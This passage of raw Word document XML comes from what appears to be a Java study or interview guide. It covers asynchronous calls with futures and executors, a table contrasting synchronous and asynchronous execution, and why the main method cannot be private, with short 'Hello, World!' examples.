          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;?&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> future1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w: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ubmi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g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ED9470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087DE8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277066A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E1F533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2C8151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DDB7F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4E884A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73604C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is running asynchronously"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E617D9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6D1CC28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Continue with other tasks while the asynchronous task is running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035FB4B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09A4E4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DD791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6C7BCC6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45DBC8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future1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ge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Wait for Task 1 to complete before shutting down executor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B172F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ion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398AA5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52CAC24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78B603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48F678E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hutdown</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3288A00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E7077F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7BB76B3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698FC10"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60ADE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1A1935F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543875C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150B822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DD0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5054367" w14:textId="0FC405F0"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0C355191" w14:textId="77777777" w:rsidR="00BB17F1" w:rsidRDefault="00BB17F1" w:rsidP="00B17288">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17A3E9A8" w14:textId="6E24935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06479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0426B7E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is running asynchronously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C68F5CC"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41AA82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4566F25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96ADCD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3A75F5A"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is executed asynchronously, allowing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to run concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3701D677"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ogram does not block on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allowing it to proceed to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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8D53BE"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finishes in the background, and we use future1.get() to wait for it to complete at the end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D288ED"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21724">
          <v:rect id="_x0000_i1175" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDBAAF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ynchronous and Asynchronous Ca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840"/>
        <w:gridCol w:w="4920"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B17288" w:rsidRPr="00CE4B95" w14:paraId="1F359ACD" w14:textId="77777777" w:rsidTr="002A323A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="053A886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1903DA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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="059AD04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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17288" w:rsidRPr="00CE4B95" w14:paraId="70119924" w14:textId="77777777" w:rsidTr="002A323A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66805DD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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="659E251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is blocked, waits for the task to complete.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F014DC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continues execution without waiting for the task.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17288" w:rsidRPr="00CE4B95" w14:paraId="6A7BCC61" w14:textId="77777777" w:rsidTr="002A323A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E2CEFC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Order</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CF8000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sequential/blocking manner.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61252E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non-blocking/parallel manner.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17288" w:rsidRPr="00CE4B95" w14:paraId="27C55F24" w14:textId="77777777" w:rsidTr="002A323A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A5C8DE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3BBD1A5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result of the task is immediately required.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60A7FDE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task can run in the background while other tasks continue.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17288" w:rsidRPr="00CE4B95" w14:paraId="2ADD84E6" w14:textId="77777777" w:rsidTr="002A323A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59DFAD1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50009F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delays, especially if tasks take time.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D8C4F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performance and responsiveness by allowing other tasks to run concurrently.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17288" w:rsidRPr="00CE4B95" w14:paraId="623DA96D" w14:textId="77777777" w:rsidTr="002A323A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F402BD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2BDED17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I/O operations, database queries (without async support).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E168D7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requests, long-running background tasks, parallel processing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7299B853"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83F6">
          <v:rect id="_x0000_i1176" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E41406A"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850EA83" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B17288">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> calls are suitable when the result is immediately required and when the tasks depend on each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534192C8" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00B17288">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="376"/>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Asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> calls are ideal for tasks that can run in parallel or do not require an immediate result, like network requests, background tasks, or long-running computations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B819EFD" w14:textId="6790813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77" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="264558AE" w14:textId="239D4284" w:rsidR="00946676" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF600C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc197867264"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we write the main method as private</w:t>
      </w:r>
      <w:r w:rsidR="00946676" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="36F8758D" w14:textId="4FC486CD" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="007139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he main method cannot be written as private if you want to run the Java program as a standalone application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C2729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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3167A737"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re's why private would not work:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7086AE5D"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odifier</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The main method needs to be static because it is called by the JVM without creating an instance of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090FA1AF"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885B57"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88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MyClass</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2024E243"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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</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4208ED05"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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Hello, World!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B79B9FF"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5B946410" w14:textId="5FC175AC"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B748BDC" w14:textId="77777777" w:rsidR="00D00F39" w:rsidRDefault="00D00F39" w:rsidP="00713982">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="589E2E90" w14:textId="4202AB5B"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not work because the JVM cannot access the private main method, and the program will not run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B393DDB" w14:textId="77777777" w:rsidR="00D00F39" w:rsidRDefault="00D00F39" w:rsidP="00713982">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A8D16A8" w14:textId="77777777" w:rsidR="00D00F39" w:rsidRDefault="00D00F39" w:rsidP="00713982">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="476D383B" w14:textId="5E06EBB3"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rrect Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C8F3A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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MyClass</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39378AD5"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static</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</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2D5E65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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Hello, World!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F1A29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C92BD44" w14:textId="03F0A550"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D76974" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00713982">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In this example, the main method is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allowing the JVM to access and execute it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E439F3" w14:textId="75BE31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78" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
